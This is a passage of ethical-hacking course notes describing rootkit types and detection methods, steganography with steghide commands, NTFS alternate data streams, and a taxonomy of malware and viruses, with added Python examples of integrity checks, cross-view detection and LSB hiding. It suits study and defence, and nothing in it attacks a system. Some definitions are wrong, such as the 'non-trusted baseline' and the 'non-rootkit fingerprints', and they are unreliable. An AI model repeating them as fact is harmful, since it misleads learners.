• Install a trojan.
• Install spyware.

Hiding Files :

Rootkit :

Types of rootkit :

• Application-level rootkit : It replaces regular application binaries with trojans.
• Kernel-level rootkit : It adds malicious code to, or replaces, the original kernel.
• Bootloader-level rootkit : It replaces the original bootloader with one controlled by the attacker.
• Hardware & firmware rootkit : These rootkits are built into a chipset for recovering stolen
computers or deleted data, or for rendering them useless.
• Hypervisor-level rootkit : It modifies the boot sequence of the computer & loads the host OS as a
virtual machine.

Detecting Rootkits :

• Integrity-based detection : It compares a snapshot of the file system, boot record or memory
with a non-trusted baseline.
• Signature-based detection : This technique compares the characteristics of all system processes &
executable files with a database of non-rootkit fingerprints.
• Heuristic / behaviour-based detection : Any deviation from the system's normal activity or
behaviour may indicate the presence of a rootkit.
• Runtime execution path profiling : This technique compares the runtime execution paths of all
system processes and executable files before and after rootkit infection.
• Cross-view-based detection : Enumerate key elements of the computer system, such as the file
system, processes & registry keys, & compare them with the result of an algorithm that
generates a similar data set without relying on the common API.
Any discrepancy between these two data sets indicates the presence of a
rootkit.

Counter Measures :
Update from time to time, use a strong firewall and antivirus, etc.
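Two of the detection techniques above reduce to set comparisons, which makes them easy to show in code. The block below is the editor's added example, not code from the notes: an integrity check that hashes a snapshot and diffs it against a baseline (modified, added and removed entries), and a cross-view check that compares a process list obtained through the normal API with one obtained by a lower-level enumeration and reports what is hidden from the API view. File contents and process tables are constructed in-line; a real implementation would read the file system and, for the raw view, walk kernel structures or a raw disk image.

```python
import hashlib


def snapshot(files):
    """files: {path: bytes}. Returns {path: sha256 hex} to keep as the baseline."""
    return {path: hashlib.sha256(content).hexdigest() for path, content in files.items()}


def integrity_diff(baseline, current):
    """Integrity-based detection: compare a fresh snapshot with the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def cross_view_diff(api_view, raw_view):
    """Cross-view detection: objects present in the raw enumeration but missing
    from the API's answer are 'hidden'; the reverse case is reported too."""
    return {
        "hidden": sorted(set(raw_view) - set(api_view)),
        "phantom": sorted(set(api_view) - set(raw_view)),
    }


# Constructed baseline and current file contents: /bin/ps has been replaced
# and a dot-file has appeared in /tmp.
BASELINE_FILES = {"/bin/ls": b"ls-binary-v1", "/bin/ps": b"ps-binary-v1"}
CURRENT_FILES = {"/bin/ls": b"ls-binary-v1", "/bin/ps": b"ps-binary-trojaned", "/tmp/.x": b"loader"}

# Constructed process tables: pid -> name. The raw view sees one more process
# than the API reports, which is the classic rootkit tell.
API_PROCESSES = {1: "init", 200: "sshd", 310: "cron"}
RAW_PROCESSES = {1: "init", 200: "sshd", 310: "cron", 4242: "backdoor"}

if __name__ == "__main__":
    print(integrity_diff(snapshot(BASELINE_FILES), snapshot(CURRENT_FILES)))
    print(cross_view_diff(API_PROCESSES, RAW_PROCESSES))
```

The baseline has to be stored somewhere the compromised host cannot rewrite, otherwise an attacker with root simply regenerates it; and the two views in a cross-view check must come from genuinely different code paths, or a hooked API will feed the same lie to both sides.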

Steganography & NTFS Data Streams

Steganography :
It is a technique of hiding a secret message within an ordinary message & extracting it at
the destination, to maintain the confidentiality of the data.

#:- steghide embed -ef ( text file ) -cf ( image ) -sf ( output file name ) -p
( password ) [ To hide ]

#:- steghide extract -sf ( image file ) -xf ( text file )
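To make the "hide a message inside an ordinary file" idea concrete, here is the simplest image-steganography scheme, least-significant-bit embedding, as an example added by the editor (it is not how steghide works internally, and unlike steghide it does no encryption). Each bit of the payload overwrites the lowest bit of one cover byte, so the cover changes by at most 1 per byte; a 4-byte length header is stored first so that extraction knows where to stop. The cover is a constructed 512-byte stand-in for pixel data.

```python
def embed_lsb(cover, message):
    """Return a copy of cover with message hidden in the low bit of each byte."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover too small: need %d bytes, have %d" % (len(bits), len(cover)))
    out = bytearray(cover)
    for index, bit in enumerate(bits):
        out[index] = (out[index] & 0xFE) | bit   # clear the low bit, then set it
    return bytes(out)


def extract_lsb(stego):
    """Read the length header, then that many bytes, from the low bits."""
    def read_bytes(bit_offset, count):
        value = bytearray()
        for k in range(count):
            byte = 0
            for i in range(8):
                byte = (byte << 1) | (stego[bit_offset + k * 8 + i] & 1)
            value.append(byte)
        return bytes(value)
    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def bytes_changed(cover, stego):
    """How many cover bytes differ, and by how much at most (always 0 or 1 here)."""
    diffs = [abs(a - b) for a, b in zip(cover, stego)]
    return sum(1 for d in diffs if d), max(diffs)


# Constructed cover: 512 bytes standing in for raw pixel values
COVER = bytes(range(256)) * 2

if __name__ == "__main__":
    stego = embed_lsb(COVER, b"hello")
    print(extract_lsb(stego), bytes_changed(COVER, stego))
```

The `bytes_changed` figure is the reason LSB hiding is hard to see by eye and also the reason it is detectable statistically: the low-bit plane of natural image data is not uniformly random, and an embedded payload flattens it, which is what steganalysis tools measure.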

NTFS Data Streams :

• NTFS ADS ( Alternate Data Stream ) is a hidden Windows stream which contains metadata
for the file, such as attributes, word count, authentication or name.
• ADS is the ability to fork data into an existing file without changing or altering its
functionality, size or display in file-browsing utilities.
• ADS allows an attacker to inject malicious code into a file on an accessible system & execute
it without being detected by the user.

Module 7 ( Malware )

Malware :

Malware is malicious software that damages or disables computer systems & gives limited
or full control of the system to the malware creator for the purpose of theft or fraud.

Types Of Malware :

• Virus.
• Trojan horse.
• Worms.
• Rootkit.
• Ransomware.
• Botnet, and so on.

Types Of Trojan :

• Botnet.
• E-banking trojan.
• Proxy server trojan.
• Defacement trojan.
• Mobile trojan.
• IoT trojan.

Stages Of Viruses :

• Design : Create the virus.
• Replication : Replication of the program.
• Launch : Perform its activity.
• Detection : The program or virus is detected by anti-virus.
• Incorporation : The activity is blocked.
• Elimination : Remove the virus.

Types Of Virus & Indications

Indications Of A Virus :

• Processes take more resources & time.
• Computer with no display.
• Unable to load the OS.
• Computer shuts down when a program starts.

Types Of Viruses :

1) System / Boot Sector Virus : A boot sector virus moves the MBR to another location on the hard
disk and copies itself to the original location of the MBR.

2) File Virus : A file virus infects files which are executed or interpreted on the system.

3) Multipartite Virus : A multipartite virus infects the system boot sector & executable files at
the same time.

4) Macro Virus : It infects files through Microsoft Excel, Word and other Microsoft files.

5) Cluster Virus : It modifies directory table entries so that they point user or system processes to
the virus code instead of the actual program.

6) Stealth / Tunneling Virus : These viruses evade anti-virus software by intercepting its
requests to the OS.

7) Polymorphic Virus : Polymorphic code is code that mutates while keeping the original algorithm
intact.

8) Metamorphic Virus : Metamorphic viruses rewrite themselves completely each time they
infect a new executable.

9) Logic Bomb Virus : This virus is triggered in response to specific events.
